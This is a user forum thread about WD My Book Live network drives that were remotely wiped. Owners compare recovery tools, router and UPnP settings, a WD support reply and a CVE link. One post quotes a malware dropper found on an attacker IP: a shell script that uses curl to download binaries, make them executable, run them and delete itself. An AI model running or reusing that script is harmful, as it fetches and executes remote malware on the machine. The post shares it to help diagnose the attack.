Help! All data in mybook live gone and owner password unknown

2 3TB MBL’s here in the UK. All data still present & no change to the admin password thankfully.

Although both drives did have a notification for ‘Firmware Updated Successfully’ in the dashboard which was a bit weird.

FYI It’s the exact same Firmware version as the latest one last issued for these drives. Is it possible that the Firmware has been hacked? Any thoughts people?

I’ve now powered down both MBL’s until this mess is confirmed as fixed, and will attempt a direct PC connection to backup all data later but honestly, what a mess.

1 Like

MYBookLive 2TB… all data gone overnight. Renamed itself back to MyBookLive. Removed HDD (broke clips in my annoyance!) and cuurently running DiskInternals Disk Recovery programme on the /DataVolume Linux Ext partition(??) Found some files on the Linux Ext Volume 2 but nothing I recognised as my pictures and documents. Not 100% sure how this Disk Internals works so hope I am doing it right!! Tried to run Recova but it could not do anything without formatting the disk first… I didn’t!!!

Update on data recovery from the repair shop…
-No success taking the drive out and trying to extract the files the basic way. The drive immediately asked to format.
-They’re now starting to use the data recovery software, so we’ll see what happens.

1 Like

Just received the following from WD Support:
Dear MARK

I apologize for the inconvenience and for the issue you are experiencing.

Western Digital is actively working on resolving this issue to the best of our customer satisfaction.

Please allow us time to investigate the issue further.

Thank you for your patience and understanding.

Oef i read about this on a newssite in the afternoon, phoned home got network disconnected, luckely i still have all my data, i do hope for a quick fix though otherwise it will turn the device (Mybookliveduo) in local only storage, which would still be vulnerable if something gets on my PC, thus a useless product.

Has anyone found a solution for this issue? I still don’t get how this happened… Were we attacked or is it a firmware bug?

Learn:

  • A Disk RAID is not a backup
  • A packet filter is not a firewall
  • Do not trust any device if the firmware has never been updated or has not updated since years.
  • Don‘t establish cloud links. Never.
  • Make sure you disable UPnP. Always.
  • Protect your network and devices adequately

Note to myself: I have tested WD NAS devices a decade ago and have thrown them away after two weeks - those WD NASes was the biggest ■■■■ a saw on the market.

Sorry to see you all with lost data. You will do it better the next time.

A link that may help you:

You may find the root cause here, it looks someone has cleaned up the mess WD has left behind:
https://nvd.nist.gov/vuln/detail/CVE-2018-18472

I‘m thankful to the person/group who ran the scan and took those devices offline. Unimaginable if someone else used those devices for brute force, DDoS or other attacks. Maybe those devices was already uncontrollable zombies and someone decided to eliminate this threat to the web or himself as an act of self-defense; you‘ll never know.

My My Book Live has been factory reset, remote access was not enabled. WD are blaming malware and claiming they have not been hacked but I cannot see how. Even with remote access off WD were able to push firmware updates so this seem the most likely scenario with IP data being harvested from WD servers.
Just ripped the disk out of the enclosure and plugged it into a SATA cradle the data’s gone.
Now ordered a Synology NAS enclosure with Seagate drives - goodbye WD.

1 Like

I was not affected. Some data in case it’s helpful in narrowing down what is causing the problem:

Firmware version 02.42.03-027
Auto update disabled.
Remote access disabled and to my knowledge has never been enabled.
Behind NAT with no port forwarding.
UPnP disabled.

Have backups but am making another one just in case.

Update on my end: Trying out Disk Drill, appears to be working. It’s been running for about 5 minutes so far out of an estimated 16 hours and it’s already found a dozen PDFs and JPGs that were deleted. At first glance they look alright, but haven’t done a deep dive on the PDFs yet. Will hold off on purchasing the full version of the program until I can find out what all can be recovered, but it looks promising so far.

For those curious, I disassembled the MBL enclosure, removed the HDD, and plugged it into another external HD case I had. After what happened I didn’t trust trying to run data recovery over the network.

2 Likes

Can you let us know when you have worked out to get into the MyBook Live. It looks as if you have to destroy the plastic case to get into it, I haven’t discovered any screws at all

The case clips together, most of clips broke while prising it apart. No loss as it will not be reassembled, I will not trust it now.

Not tried it yet but found this on YouTube:

From now on, if you lost data, please let us know the following:

  1. On your router, is UPnP enabled or disabled?
  2. Before the device was reset, was Remote Access enabled or disabled?
  3. Did you have Auto Update enabled or disabled?

If any of these are enabled, particularly UPnP, disable them immediately.

Useful, but I’m hoping there is WD fix before I have to destroy the case!

I posted this on reddit, but here it is and hopefully, WD can use this info.

(note edited to only include one link because I’m a new user)

My Netgear Armor started complaining that my WD MyBookLive was trying to reach a couple of URLs and that they were blocked. These were qlitrk dot com (with various sub domains such as supertrk dot qlitrk dot com) and 185.153.196.30/WSC0

I finally looked at what IP address /WSC0 contained and it was this:

#!/bin/sh
n=“OFJU”
if [ $# -gt 0 ]; then
n=$@
fi
cd /tmp
for a in $n
do
rm $a
curl -O http://185.153.196.30/$a
chmod +x $a
./$a
done
for a in $n
do
rm -rf $a
done
rm $0

I’m thankful that Netgear blackholed that 185 address but sheesh… too close for comfort.

If it helps
UPnP enabled
Remote access disabled
Auto update don’t know
Lost data

1 Like

My 3TB MBL’s are both powered down now, with no data loss and account still accessible.

But as I said before in a previous I had a ‘Firmware Successfully Installed’ message in both Dashboards when I logged in.

As I’m a BT customer I’m using a Smart Hub 2 which does have UPNP on for the WD devices on my network.

I do have to ask shouldn’t turning off Remote Access & unchecking check for updates in the Dashboard physically disconnect MBL’s from all internet traffic?

I’ve also disabled Access to the internet on those devices on the Smart Hub, so when / if do turn them on again, they’re not accessible. At least, that’s the theory…

The REST API was accessible to the public, maybe because of UPnP - what a beautiful world, it just works and nobody needs any knowledge.

1 Like
  1. UPnP is enabled on my router
  2. Remote access was enabled prior to this threat, it is off now
  3. Auto Update was disabled
  4. did not lose data
  5. FTP service was disabled
  6. my device’s network name was not a common name
  7. the last firmware updated was received in 2016

nas-firmware

2 Likes